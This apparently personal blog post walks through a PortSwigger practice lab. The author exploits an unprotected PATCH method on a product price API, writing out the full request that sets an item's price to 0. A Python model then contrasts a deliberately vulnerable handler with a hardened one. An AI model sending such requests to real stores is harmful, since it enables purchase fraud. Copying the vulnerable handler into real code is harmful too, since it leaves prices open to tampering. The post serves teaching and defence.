API Lab: Finding and exploiting an unused API endpoint

Tech Stuff Daily: Entry 1 - Hacking APIs

Bismillah

Lab Source: PortSwigger Web Security Academy

API endpoints can cause problems if they are not secured properly.
In this lab, I exploited the API call that fetches an item's price:

While adding an item to the cart, I noticed the following API request being made for the price of the item:

GET /api/products/1/price

The initial idea was to modify this request so that the price changes from its current value to $0.

How did I do it?

1. I changed the request method from GET to PATCH on the same endpoint, as follows:

PATCH /api/products/1/price

2. When I tried to send the request, I kept getting a "content type not supported" error, with JSON named as the expected content type. This prompted me to add a Content-Type header and set it to JSON, as follows:

Content-Type: application/json; charset=utf-8

3. I then added the price change as a JSON body:

{ "price":0 }

4. Thus the whole request becomes:

PATCH /api/products/1/price HTTP/2
Host: ......
Content-Type: application/json; charset=utf-8
Cookie: .....
User-Agent: .....
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: ..../product?productId=1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Length: 15

{ "price":0 }

This request returned a successful price change.

I then re-added the item to the cart and placed the order.

Practice API bug successfully exploited!!
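To show why this worked, here is an added Python model of the price endpoint, written for this post and not taken from the lab or from PortSwigger: the unprotected routing that lets any customer PATCH a price sits beside a hardened version that restricts PATCH to administrators and validates the value. The route regex, the role names and the in-memory catalogue are constructed for the example.

```python
import json
import re

PRICE_ROUTE = re.compile(r"^/api/products/(\d+)/price$")  # constructed route pattern

def _lookup(catalogue, path):
    m = PRICE_ROUTE.match(path)
    return catalogue.get(int(m.group(1))) if m else None

def _parse_json_body(headers, body):
    # Mirrors the "JSON content type expected" check observed in the lab.
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return None, (415, {"error": "content type not supported, expected application/json"})
    return json.loads(body), None

def vulnerable_price_endpoint(catalogue, method, path, headers, body, user):
    # The PATCH branch was routed but never protected: no role check, no validation.
    product = _lookup(catalogue, path)
    if product is None:
        return 404, {"error": "not found"}
    if method == "GET":
        return 200, {"price": product["price"]}
    if method == "PATCH":
        data, err = _parse_json_body(headers, body)
        if err:
            return err
        product["price"] = data.get("price")  # any caller can set any value, including 0
        return 200, {"price": product["price"]}
    return 405, {"error": "method not allowed"}

def hardened_price_endpoint(catalogue, method, path, headers, body, user):
    # Same route; PATCH now needs the administrator role and a sane price.
    # If PATCH is genuinely unused, the cleanest fix is not to route it at all.
    product = _lookup(catalogue, path)
    if product is None:
        return 404, {"error": "not found"}
    if method == "GET":
        return 200, {"price": product["price"]}
    if method == "PATCH":
        if user.get("role") != "administrator":
            return 403, {"error": "forbidden"}  # worth alerting on: customers never PATCH prices
        data, err = _parse_json_body(headers, body)
        if err:
            return err
        price = data.get("price")
        if isinstance(price, bool) or not isinstance(price, (int, float)) or price <= 0:
            return 400, {"error": "price must be a positive number"}
        product["price"] = float(price)
        return 200, {"price": product["price"]}
    return 405, {"error": "method not allowed"}
```

Replaying the lab's PATCH against the vulnerable handler as a customer rewrites the price to 0; the hardened handler answers 403 and leaves the catalogue untouched.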

Lab: https://portswigger.net/web-security/api-testing/lab-exploiting-unused-api-endpoint